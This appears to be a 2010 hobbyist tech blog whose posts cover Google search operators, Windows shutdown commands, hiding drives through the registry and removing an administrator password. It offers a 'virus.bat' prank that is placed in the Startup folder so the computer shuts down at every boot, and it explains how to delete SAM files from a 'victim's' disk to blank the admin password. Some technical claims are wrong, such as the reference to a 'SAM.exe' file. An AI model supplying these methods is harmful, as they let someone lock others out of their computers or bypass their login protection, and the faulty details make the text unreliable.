Saturday, December 11, 2010

Google Search Tips.

Try these tips :
1. Use Of '+' sign :
This ensures that the results returned to you will definatly consist of the word following the '+' sign. For Eg :
Search: reviews of +iPhone and iPod
This will show results containing the word reviews or iPod but the results will definatly consist of iPhone !

2. Use Of '-' sign :
Using '-' sign before any word will ensure that the particular word will not be included in the results !

3. Use Of '~' sign :
Using '~' before any word will return the results also containing the synonyms of the word !

4. Search a particular site :
To search a particular website you can use the following syntax in the google search :
Search: site:www.xyz.com abc
For Eg :
Search: site:http://pcremix.blogspot.com/ Google Search Tips

5. Define a word :
To get the definition of a word just use :
Search: define:abc
For Eg : Search: define:Computer
This will return you results which define 'Computer'.

6. Find Pages similar to a page :
To find a page similar i.e. consisting of same type of content, use the following syntax :
Search: related:http://www.xyz.com/

7. Search for exact phrase :
To search a set of words exactly together i.e.
For Eg :
Search: "contact us"
This will return the results containing both contact and us together !

8. Using the wild card '*' :
The * sign can be used in places where the whole word is not known.
For Eg:
Search: friend*
This will return the results containing friend , friends , friendship.

9. Using the '?' sign :
This is used when the full spelling of the word is not known.
For Eg:
Search: fri??d
This will result that in the results in which any alphabet can take the place of '?' sign.

10. Use of boolean operators :
The boolean operators like AND,OR,NOT can be used in search box to connect the words !
The search engine understands them as what they mean but the must be in capital letters !
For Eg:
Search: swim OR float
This will return the results containing either swim or float !

Create Shutdown/Restart VIRUS.

Shutdown Trick
Stimulate shutdown from command prompt !
# Start >> Run
# Type shutdown -s -t 10 -c "Shutting Down..."
# Hit Enter and enjoy !

****************************************************************************

Restart Trick
Stimulate Restart from command prompt !
# Start >> Run
# Type shutdown -r -t 10 -c "Restarting..."
# Hit Enter and enjoy !

****************************************************************************

Log Off Trick
Stimulate LogOff from command prompt !
# Start >> Run
# Type shutdown -l
# Hit Enter and enjoy !

****************************************************************************

Please Note
-s :: This signify Shutdown Request.
-r :: This signify Restart Request.
-l :: This signify LogOff Request.
-t :: This signify the timer before Restart. (Replace '10' with any number.)
-c :: This signify comment.

How To Stop It ?
# When the timer is Running...
# Start >> Run
# Type shutdown -a
# That's It.

Prank !!!
-------------------------------------------------------------
۩ We can make a batch file which will Shutdown the computer everytime on startup !
Here is how ?
► Open Notepad
► Type :
@ECHO OFF
shutdown -s -t 10 -c "Virus Attack..."
exit
► File >> Save As...
► Name it : virus.bat
► Start >> All Programs
► Right Click on Startup >> Open
► This open the Startup folder
► Paste the Virus.bat file here !
*** That's all , now the computer will automatically shutdown on every startup !

Wednesday, December 8, 2010

How to hide DRIVES from MY COMPUTER

How to hide C, D or any drive from My Computer?

You can hide A:, B:, C:, D: or any drive from My Computer. Windows Registry has this magic. Your users will not able to see hidden drives from My Computer. It is easy to do this.

First of all open Registry Editor by typing “regedit” in Run Command without quotes.



If you want to hide drives for logged in users only then open this path in Registry Editor.
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer

If you want to hide drives for every user of Windows then open this path in Registry Editor.
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer

After opening this key create new string key named NoDrives
Regedit Create Key

Regedit Create Key

If you want to hide A: drive then enter value 1 and 2 for B: drive. Here it is table for hide drives.
DriveCode
A1
B2
C4
D8
E16
F32
C: and D:12
C:, D:, E:28


After adding this key log off or restart your windows. If you are using Windows 9x then you must restart your windows. After restarting your windows Open My Computer. You will see that your selected drives are hidden now. If you want to get back your drives in My Computer then simple delete created key above.

Monday, December 6, 2010

How to "Delete administrator Password" without any software

Method 1

Boot up with DOS and delete the sam.exe and sam.log files from Windows\system32\config in your hard drive. Now when you boot up in NT the password on your built-in administrator account which will be blank (i.e No password). This solution works only if your hard drive is FAT kind.

Method 2
  1. Put your hard disk of your computer in any other pc .
  2. Boot that computer and use your hard disk as a secondary hard disk (D'nt boot as primary hard disk ).
  3. Then open that drive in which the victim’s window(or your window) is installed.
  4. Go to location windows->system32->config
  5. And delete SAM.exe and SAM.log
  6. Now remove hard disk and put in your computer.
  7. And boot your computer :-)